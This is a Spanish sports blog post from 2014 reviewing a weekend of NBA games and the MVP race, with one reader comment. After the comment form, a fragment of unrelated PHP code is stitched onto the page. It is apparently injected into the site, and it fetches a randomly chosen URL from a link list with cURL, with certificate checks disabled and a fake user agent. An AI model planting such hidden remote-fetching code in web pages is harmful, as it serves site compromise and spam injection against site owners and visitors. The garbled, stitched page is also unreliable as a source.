Informe del fin de semana: Cuesta arriba

24 de March de 2014 por TheDeerHunter

La dureza de la regular alcanza su máxima expresión en este tramo final de la regular. Lesiones y agotamiento contrastan con lo que debería ser la puesta a punto final de cara a la resolución del título. Muy pocos pueden permitirse el lujo de contemporizar en este momento. Mientras, además, parece inclinarse definitivamente la balanza del MVP.

El viernes fue noche de infarto para muchos…

“Todo el pabellón, los árbitros, los comentaristas, mi novia que no ha visto un partido en su vida…. todo dios ha visto que el partido se iba a complicar menos Mike Woodson. Por suerte para él, los Sixers dan pena y además no han tenido fortuna en la última jugada en la que no ha entrado un triple de MCW que ha estado a punto de mandar el partido a la prórroga.” Simon

Mejor explicado imposible. Hubiera sido el culmen de la incapacidad que los Knicks, colgados del último hilo de esperanza para maquillar una pésima temporada, se hubieran dejando levantar 17 puntos ante un equipo tan infame como los actuales Sixers que están en situación de pulverizar la peor racha de derrotas de todos los tiempos. En condiciones normales no deberíamos verles conseguir ninguna victoria más pero Woodson, al que evidentemente le han doblegado las circunstancias, decidió que había que darles vidilla. Lo que les hubiera faltado a los suyos, un tropiezo de tal calibre. Ya pueden decir que la fortuna les sonrió en esta ocasión.

 

Pero el notición de la noche venía de la cabeza de la liga.

“Ahora si que si,a pesar de esa serie de partidos de LeBron,su bajón de los últimos partidos sumado a la falta de tiempo material para borrar la extraordinaria campaña de Kevin Durant (hoy 51 p,12 r,7 a),buzzer beater en último partido incluido.” Ruxixon

Por un lado al vigente MVP se le apareció la virgen en forma de lesión de Marc Gasol, cuando éste y Zach Randolph le estaban enseñando el Kama-Sutra a los interiores del bicampeón. En directo parecía que podía haber afectado a la rodilla tocada y los Grizzlies colapsaron del susto cuando el choque parecía controlado. LeBron, en un partido individualmente gris, se llevaba la victoria casi por castigo. Por su parte, a Durant y los Thunder también se les encogía el corazón en la nueva lesión de Westbrook, grave en apariencia. KD35 se destapó con otra actuación épica ante unos excelentes Raptors con esta canasta mágica como colofón que apenas podemos creer.

No terminaba aquí la cosa. Anticipábamos noche de pasión y así fue. Eric Bledsoe acudió al rescate en un último cuarto mágico para mantener a los Suns en la pomada ante Pistons. Termine como termine todo esto, vaya equipo ejemplar son los pupilos de Hornacek. Por su parte, Anthony Davis volvía a abusar como nos tiene acostumbrados el último mes pero esta vez ante un rival temible como lo deberían ser los Hawks, en Atlanta. Otra vez a mirar para abajo, los halcones… El resto de jornada discurrió más o menos por los cauces normales. Los Pacers lograron doblegar a los durísimos Bulls pero necesitaron un parcial de 19-0 en un tercer cuarto casi inconcebible y una actuación como hacía años que no veíamos de Luis Scola; los Nets mantenían su gran racha de juego y resultados ante Celtics; los Mavs destrozaban a los Nuggets y Hickson terminaba “out of season” para aclarar el feo panorama de su equipo; los Spurs no tenían ni para empezar con los Kings, y “manda cojones” que el Staples tenga que ver una pelea en una temporada com la que están protagonizando los Lakers.

El sábado había “más madera” como por ejemplo un par de “back to back’s” decisivos para la clasificación. Pudimos ver a los Pacers absolutamente asfixiados, impotentes ante unos Grizzlies que recuperaban con gran alivio a Marc. Parece mentira que un equipazo como es Memphis vaya a sufrir hasta el final de la regular para asegurar su presencia en las eliminatorias. Para solidarizarse, los Heat caían esta vez en New Orleans, con otra bestialidad de actuación de Davis. También vimos totalmente desencajados a los Blazers, que recibieron una brutal paliza de Al Jefferson y los Bobcats. En cambio, los que no parecen notar el desgaste son los Spurs que doblegaron con cierta comodidad nada menos que a los Warriors. Además asistimos a las exhibiciones de Harden y de CP3 ante Cavs y Pistons respectivamente y a la 24ª derrota consecutiva de los Sixers. En el partido amistoso del día Trey Burke decidió ante Orlando.

Y el Domingo aún quedó pasión en el tintero. Merendábamos con la, hasta cierto punto lógica, derrota de los Hawks en Toronto que dejaba la octava plaza del Este a tiro de piedra de los Knicks pero los de la Gran Manzana devolvían la deferencia con la “penúltima” decepción a sus aficionados. Regalaron en la segunda parte un partido asequible ante los Cavs que tenían más o menos controlado en la primera. Ridículo, nuevamente. Vaya momento de Jarrett Jack para resucitar, por cierto.

Los Wolves también se hacían el preceptivo hara-kiri, éste seguramente definitivo, ante un teórico rival directo como los Suns. Meter 102 puntos en 3 cuartos para ahogarte en la orilla del último. El resumen de su decepcionante campaña. Luchar contra el rival y contra si mismos. En todo caso los Suns merecen infinitamente más que el equipo de Adelman estar en Playoffs.

Además, Jason Kidd regresaba a Dallas para pegar el petardazo en la prórroga con los Nets y pasar así a los Wizards, que tropezaron en Denver.

Finalmente los Kings ganaron a Bucks y los Lakers a Magic… Como si nos importara.

Comenta

Un comentario a esta entrada

  1. Viva_Dirk dice:
    #1

    Los Grizzlies van a ser un auténtico coco en 1era ronda. Salvo a San Antonio que saber jugar a cualquier ritmo y adaptarse a todas las situaciones, al resto los veo sufriendo como perros contra Memphis.

    Y si los Thunders están sin Westbrook será otro año que Durant ve muy muy lejos la pelea por el anillo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>